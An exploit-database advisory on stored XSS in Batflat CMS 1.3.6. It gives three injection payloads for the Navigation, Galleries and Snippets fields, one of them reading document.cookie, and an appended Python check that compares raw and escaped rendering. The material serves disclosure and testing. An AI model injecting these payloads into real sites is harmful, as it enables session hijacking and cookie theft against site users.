## https://sploitus.com/exploit?id=PACKETSTORM:161505
# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS  
# Date: 22/02/2021  
# Exploit Author: Tadjmen  
# Vendor Homepage: https://batflat.org/  
# Software Link: https://github.com/sruupl/batflat/archive/master.zip  
# Version: 1.3.6  
# Tested on: XAMPP on Windows, latest Firefox  
# CVE : N/A  
  
Multiple stored cross-site scripting (XSS) vulnerabilities in Batflat CMS 1.3.6  
  
Log in with an editor account that has rights to the Navigation, Galleries and Snippets modules. Each of the fields below stores the submitted value, and the payload executes whenever the stored entry is rendered again.  
  
Navigation  
- Add link  
payload: "><img src=x onerror=alert(document.cookie)>  
  
Galleries  
- Add gallery  
payload: mlem"><svg/onload=alert(1)>  
  
Snippets  
- Add snippet  
payload: mlem"><svg/onload=alert("TuongNC")>  
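As an added example, not part of the original advisory and not Batflat's own code: a small Python check that takes the three payloads above, renders each into a constructed admin-form fragment (an assumed stand-in for how a CMS echoes a stored field back into a quoted attribute; the real Batflat templates are not reproduced here) and reports whether an attacker-controlled element with an inline event handler actually appears in the parsed result. It does so once with raw concatenation and once with proper output encoding, which is the check a tester runs to confirm a stored XSS rather than a merely reflected string.

```python
import html
from html.parser import HTMLParser

# The three payloads reported in the advisory, keyed by the admin module.
PAYLOADS = {
    "navigation": '"><img src=x onerror=alert(document.cookie)>',
    "galleries": 'mlem"><svg/onload=alert(1)>',
    "snippets": 'mlem"><svg/onload=alert("TuongNC")>',
}

# Constructed stand-in for an admin form that echoes a stored field back into
# a quoted attribute. This is an assumption about the rendering context, not
# a copy of Batflat's templates.
FORM_TEMPLATE = '<form><input type="text" name="name" value="{{value}}"></form>'


class InlineHandlerFinder(HTMLParser):
    """Collects every element that carries an inline event-handler attribute.

    A correctly encoded payload never produces such an element: the parser
    sees only text inside the value attribute. A payload that broke out of
    the attribute produces a real <img onerror> or <svg onload> element.
    """

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # HTMLParser lowercases tag and attribute names; any on* attribute
            # is an inline handler the template never intended to emit.
            if name.startswith("on"):
                self.hits.append((tag, name, value))


def render_unescaped(template, value):
    """Vulnerable rendering: the stored value is concatenated verbatim."""
    return template.replace("{{value}}", value)


def render_escaped(template, value):
    """Hardened rendering: encode &, <, >, " and ' before emitting the value.

    html.escape(..., quote=True) is the Python counterpart of PHP's
    htmlspecialchars($value, ENT_QUOTES), the fix a PHP CMS would apply.
    """
    return template.replace("{{value}}", html.escape(value, quote=True))


def find_inline_handlers(page):
    """Parse the rendered page; return (tag, attribute, value) per inline handler."""
    finder = InlineHandlerFinder()
    finder.feed(page)
    finder.close()
    return finder.hits


def is_stored_xss(page):
    """True when the rendered page contains an element the attacker controls."""
    return bool(find_inline_handlers(page))


def audit(payloads, template=FORM_TEMPLATE):
    """Return {module: (vulnerable_when_raw, vulnerable_when_escaped)}."""
    return {
        module: (
            is_stored_xss(render_unescaped(template, payload)),
            is_stored_xss(render_escaped(template, payload)),
        )
        for module, payload in payloads.items()
    }


if __name__ == "__main__":
    for module, (raw, escaped) in audit(PAYLOADS).items():
        print(f"{module:11s} raw: {'XSS' if raw else 'ok'}   escaped: {'XSS' if escaped else 'ok'}")
```

Parsing the response instead of grepping for the payload string matters: a field that echoes the payload HTML-encoded still contains the same characters after decoding, but no element with an `onerror` or `onload` attribute ever exists in the DOM, so only the unencoded rendering counts as a confirmed stored XSS. Pointing the same check at the rendered Batflat page for each module (after logging in and saving the entry) is the manual step the advisory describes.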
  
More information:  
https://github.com/sruupl/batflat/issues/105